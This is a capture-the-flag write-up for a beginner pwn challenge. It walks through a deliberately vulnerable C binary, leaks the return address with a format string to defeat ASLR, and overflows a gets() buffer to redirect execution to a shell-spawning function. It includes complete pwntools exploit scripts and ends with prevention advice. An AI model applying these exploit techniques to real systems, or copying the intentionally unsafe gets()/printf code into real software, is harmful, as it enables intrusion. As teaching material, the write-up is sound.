10 minutes
Introduction to Pwning 1 Write-Up
Challenge Description:
This is an introductory challenge for exploiting Linux binaries with memory corruptions. Nowadays there are quite a few mitigations that make it not as straight forward as it used to be. So in order to introduce players to pwnable challenges, LiveOverflow created a video walkthrough of the first challenge. An alternative writeup can also be found by 0x4d5a. More resources can also be found here. Service running at: hax1.allesctf.net:9100
Research
The Introduction to Pwning 1 is a Pwning challenge with difficulty “Baby”.
To begin we are provided with a zip compressed file that contains all necessary challenge files and a docker-compose file. It turns out that we have to interact with a program over the network, for example netcat, and the goal is to read the flag file which is stored on the server. With the docker-compose file we can easily set up our own local server, so now let’s go.
This challenge also provides us with the source code of the pwn1 program which we interact with.
At the top we can see that the program was compiled without stack canaries so we can smash the stack without problems.
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <signal.h>
#include <string.h>
// pwn1: gcc pwn1.c -o pwn1 -fno-stack-protector
Next a few helper functions that we can ignore are declared and then the main logic of the program is implemented. We can find two functions, welcome
and AAAAAAAA
:
// --------------------------------------------------- MENU
void WINgardium_leviosa() {
printf("┌───────────────────────┐\n");
printf("│ You are a Slytherin.. │\n");
printf("└───────────────────────┘\n");
system("/bin/sh");
}
void welcome() {
char read_buf[0xff];
printf("Enter your witch name:\n");
gets(read_buf);
printf("┌───────────────────────┐\n");
printf("│ You are a Hufflepuff! │\n");
printf("└───────────────────────┘\n");
printf(read_buf);
}
void AAAAAAAA() {
char read_buf[0xff];
printf(" enter your magic spell:\n");
gets(read_buf);
if(strcmp(read_buf, "Expelliarmus") == 0) {
printf("~ Protego!\n");
} else {
printf("-10 Points for Hufflepuff!\n");
_exit(0);
}
}
// --------------------------------------------------- MAIN
void main(int argc, char* argv[]) {
ignore_me_init_buffering();
ignore_me_init_signal();
welcome();
AAAAAAAA();
}
You also should notice the WINgardium_leviosa
function which obviously looks kinda like the “goal function” cause it spawns a new shell. But this function gets never called.
So our primary goal is to redirect code execution in order to gain a shell and read the “flag” file which is hosted on the target server hax1.allesctf.net:9100.
Exploitation
We obviously have a vulnerability in the welcome
and AAAAAAAA
function:
char read_buf[0xff];
gets(read_buf);
gets
never checks the boundary of the buffer, so we can write more than 0xff
bytes and overwrite the return address of the current stack frame.
My first thought was to overflow the return address in the welcome
Stack Frame to redirect code execution to WINgardium_leviosa
but that turned out to be impossible without knowing the exact position of the WINgardium_leviosa
function, cause every time you run the program, the address change.
That behavior looks pretty much like ASLR, and a quick look at checksec verifies that ASLR, RELRO, and Stack execution protection are all enabled:
URGG!! That I should have noticed before. But, anyway lets move on.
So we have to somehow dynamically get the address of WINgardium_leviosa
, and use this information to overflow the return address in the AAAAAAAA
Stack Frame.
Base Address Leak through Format String Exploit
Another vulnerability I noticed is the wrong usage of printf
function in welcome
, which allows us a Format String attack:
printf(read_buf);
From OWASP:
The Format String exploit occurs when the submitted data of an input string is evaluated as a command by the application. In this way, the attacker could execute code, read the stack, or cause a segmentation fault in the running application, causing new behaviors that could compromise the security or the stability of the system.
and Wikipedia:
The problem stems from the use of unchecked user input as the format string parameter in certain C functions that perform formatting, such as printf(). A malicious user may use the %s and %x format tokens, among others, to print data from the call stack or possibly other locations in memory. One may also write arbitrary data to arbitrary locations using the %n format token, which commands printf() and similar functions to write the number of bytes formatted to an address stored on the stack.
Our Goal with this Format String exploit is to somehow get the base address of the .code section, so that we can calculate the address of the WINgardium_leviosa
function relative to the base address
But how can we get that base address? Well, we could read the return address of the current welcome
Stack Frame. That address points to an instruction in main and that address has a static offset to the base address. So the formula to calculate the base address would then be:
base_address = ret_addr - offset_ret_addr_to_base_addr
First let’s read 50 addresses from the stack. The formatter %p
expects a pointer from type void*
so lets use this as our formatter.
First I’ve attached gdb to the server and set a breakpoint when calling the printf
function:
Now I’ve sent 50 times %p
over netcat to my local server, and we hit the breakpoint in gdb. Let’s inspect the stack.
We can see that RDI, where the first argument for printf
, the 50 %p
’s, is stored, points at the top of the stack. We also can see the return address to 0x55981a9d6b21
right after where rbp is pointing to.
Now continuing in gdb and look what we get as output from the format string.
OHH look! There is our return address 0x55981a9d6b21
! That’s cool. Now let’s calculate how many %p
’s we must supply in order to get exactly the return address. Well, you can simply count on which index 0x55981a9d6b21
in the output is, but let’s practice some more math:-).
The distance from the start of the read_buf
variable to the return address is
>>> distance = 0x7ffe19d360d8 - 0x7ffe19d35fd0
>>> distance
264
Because half of this space is occupied by the %p
’s and each is 3 bytes long, we get
>>> distance/2/3
44.0
Due to the calling conventions in 64-bit, we have to consider the registers, that also has an argument assigned: - RSI - RDX - RCX - R8 - R9
So finally, when we subtract these 5 registers, we get:
>>> distance/2/3-5
39.0
Instead of writing 39 times %p
we can use the direct access formatter %39$p
.
Now we can read the return address. Let’s get the offset from it to the base address. To get the current base address we use vmmap
in gdb:
The last 12 bits have to be the offset. Our previous return address was 0x55981a9d6b21
, so the offset is 0xb21
and thus the previous base address would have been 0x55981a9d6000
.
Now that we have a way to dynamically calculate the base address, we can easily calculate the address of WINgardium_leviosa
, too. Find the offset with objdump,
and the formula for calculating the WINgardium_leviosa
function is:
WINgardium_leviosa_location = base_address + 0x9ec
Buffer Overflow in AAAAAAAA
To get the program returning into the WINgardium_leviosa
function, the ret
instruction in AAAAAAAA
must be executed. But this only happens if the following if-case is true:
if(strcmp(read_buf, "Expelliarmus") == 0) {
printf("~ Protego!\n");
Otherwise, the program will exit and never reaches the ret
instruction:
} else {
printf("-10 Points for Hufflepuff!\n");
_exit(0);
}
So how can we write more than just “Expelliarmus” in read_buf
through gets
, but at the same time trick strcmp
into thinking it’s really only “Expelliarmus” ?
Null-Terminated Strings
In C every string is terminated by a NULL character 0x00
. strcmp
stops when encountering a NULL character, but gets
stops only at a newline \n
. So we can craft our final payload like this:
payload = "Expelliarmus\x00" + "A"*251 + WINgardium_leviosa_location
Cause “Expelliarmus00” is 13
bytes long, the padding to the return address is 0xff+8(rbp)-13 = 251
bytes long.
Let’s put this all together in a python3 program. I am using pwntools for communication with the server:
from pwn import *
import struct
p = remote('127.0.0.1', 1024)
print(p.recvline()) # Enter your witch name:\n
base_address_leak_payload = b'%39$p'
p.sendline(base_address_leak_payload)
print(p.recvline().decode('utf-8')) # ┌───────────────────────┐
print(p.recvline().decode('utf-8')) # │ You are a Hufflepuff! │
print(p.recvline().decode('utf-8')) # └───────────────────────┘
memory_leak = p.recvline().split(b' ') # [0x?????????????b21, 'enter', 'your', 'magic', 'spell:\n']
ret_addr = int(memory_leak[0], 16) # converting from string to hex
base_address = ret_addr - 0xb21
print('base_address: {0}'.format(hex(base_address)))
WINgardium_leviosa_location = struct.pack('Q', base_address + 0x9ec) # pack in 64-bits alligned
payload = "Expelliarmus\x00" + "A"*251 + WINgardium_leviosa_location
input('attach gdb')
p.sendline(payload)
p.interactive()
When we run this with gdb attached we can see our return address to WINgardium_leviosa
is successfully injected:
but when we continue gdb encounters an error:
This is a bit strange because we successfully redirected code execution to the WINgardium_leviosa
function, but inside the system("/bin/sh");
function call the program crashes..
Let’s look at the instruction that causes the problem:
movaps xmmword ptr [rsp + 0x50], xmm0
From MOVAPS Description:
When the source or destination operand is a memory operand, the operand must be aligned on a 16-byte (128-bit version) boundary or a general-protection exception (#GP) will be generated.
So the destination operand is [rsp + 0x50]
, and is obviously not 16-byte aligned.
Now how we can change rsp
?
There are multiple instructions that do this:
push
instructionpop
instructioncall
instructionret
instructionsub
rsp, 0x08add
rsp, 0x08
Let’s use a tiny rop chain to reduce rsp
by using one other ret
instruction. For the first ret
we simply use the ret
from AAAAAAAA
itself, so we’re basically jumping on point but reducing the stack. The offset of this ret
can simply be obtained
And now we put this all together and get our final exploit script.
from pwn import *
import struct
p = remote('hax1.allesctf.net', 9100)
print(p.recvline()) # Enter your witch name:\n
base_address_leak_payload = b'%39$p'
p.sendline(base_address_leak_payload)
print(p.recvline().decode('utf-8')) # ┌───────────────────────┐
print(p.recvline().decode('utf-8')) # │ You are a Hufflepuff! │
print(p.recvline().decode('utf-8')) # └───────────────────────┘
memory_leak = p.recvline().split(b' ') # [0x?????????????b21, 'enter', 'your', 'magic', 'spell:\n']
ret_addr = int(memory_leak[0], 16) # converting from string to hex
base_address = ret_addr - 0xb21
print('base_address: {0}'.format(hex(base_address)))
WINgardium_leviosa_location = struct.pack('Q', base_address + 0x9ec)
AAAAAAAA_ret_location = struct.pack('Q', base_address + 0xaf3)
shell_payload = b"Expelliarmus\x00" + b"A"*251 + AAAAAAAA_ret_location + WINgardium_leviosa_location
input('attach gdb')
p.sendline(shell_payload)
p.interactive()
When we run this script again, it spawns a shell:
Now you only have to change the server and port address, and you are good to go:
p = remote('hax1.allesctf.net', 9100)
Prevention
This section covers a few prevention measures for the above discussed security issues.
Format String Protection
Basically the best thing you can do to mitigate Format String exploits are the correct usage of printf
with formatters:
printf("Hello, %s", name);
The compiler can help you find wrong usage of print-functions by turning the -wformat
compiler flag on.
Also, you always have to validate user-controlled input as this is generally a good idea and helps the prevention of Format String attacks.
Because of the arbitrary read/write possibilities in Format String exploits you really should avoid these. The Buffer Overflow exploit in this challenge would be much more difficult to exploit without the Format String exploit to leak the base address and thus bypassing ASLR.
Buffer Overflow Protection
To prevent Buffer Overflow attacks such as one just discussed, a good idea is to turn on all security protections especially the stack-cookie protector and ASLR, cause then overwriting rbp and the return address is much more difficult.
Another approach is to use safe “buffer-reading” functions such as fgets that only read so much you tell it to.
On C++, only use the strn-
versions as they provide this same boundary check capability.
Conclusion
This Challenge was really fun to me and I learned a lot. We used a Format String exploit to leak the base address and thus bypassing ASLR. Then we used a Buffer Overflow to redirect code execution to the wanted function. I hope you now understood the exploit and techniques which we used and enjoyed this Write-up.